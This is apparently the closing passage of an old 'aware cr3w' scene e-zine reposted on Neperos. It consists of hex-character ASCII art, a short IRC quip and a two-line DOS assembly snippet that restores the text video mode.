43894E690A8FCD6BFFC2325602BE5B9A1E3529EDC610C780878DD79C63
:A52BCB8D42BFFDC72DE221729F0A5A221A01EEEAFDCC83C90165E195B0;
C7FA692DAAA1D35EE0AFEA42CC318E55F8CFD72D51B27FBCC8BA9C9B7EB0
:4C9305261B2265F5E69EA44DE49FD840B713E5D94B8DBD52E46033CFE50B;
:A249372A3F396FA0FD5B6432B796C57E3DC5B3275607BA92D82E1E839482;
C63AB12D97C8445D031BF57246E5616FAC1E713B7B58EF193C15C2A4598ABC
379BD8E3C0133B394F83D67F5B20FD797AD4CADA1EB9621A9F517E0D6925F7
:D1D54FCB21589171B2DBE1D8E87936ABAP"' "QCE3AD9D4CAA0A74B33;
:B832EACD8E987E0F18365F974D98F7FF1Y Y04CCB95C9904CC617;
77CF38BC802B1B933E79C99432F185103 EC58A3DB7240EC742
:039AD9304D24EA8E5C13B76E6C7F71CA. .624F0879C4820007;
F383A4082BDB1378F30D6E5797FD9559O O050224388E474486
:D05F6D6317D05EFAB48C9C9F77D884C2o,_ _,oDD5FF0DDD9238647;
T29CFE61A0A56AF9929295E12C5E82B2FB3CF5F811B4D8C5E35E210P
T3B04FAE89130E3915652630B8B84EFEB7BBAB4142EB46C90922EP
T02EF86A5DF116B42275CD09135EBA92A51662C9F719C944ABAP
TA8137CFF503939AEB079D9566230965C652A2ACEAC29D347P
TD45EB4066AC89F3EF5B7E148C295C575ECF62E8E080119P
`TF0FDC2A352208F32F3EB2B6F1C94A5F220EC9AE9D0P'
`TD5E77B45C728B6AD5549DA225C3A855CAE9ACCP'
"^DE7171378BED7E10E5DEB5A0A8377593FF^"
"^T8314220058FB8B21831A734F04P^"
'""^^^T72B267EFA7T^^^""'


<aWkZ> depends on the drugs employed.
<rattle> always. always does.



mov al,3 ; .aware cr3w restores video m0de - - = ==== = === =]
int 10h ; - = = = = ==== ======= === ======= = ======== =]
[==============================================================================]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT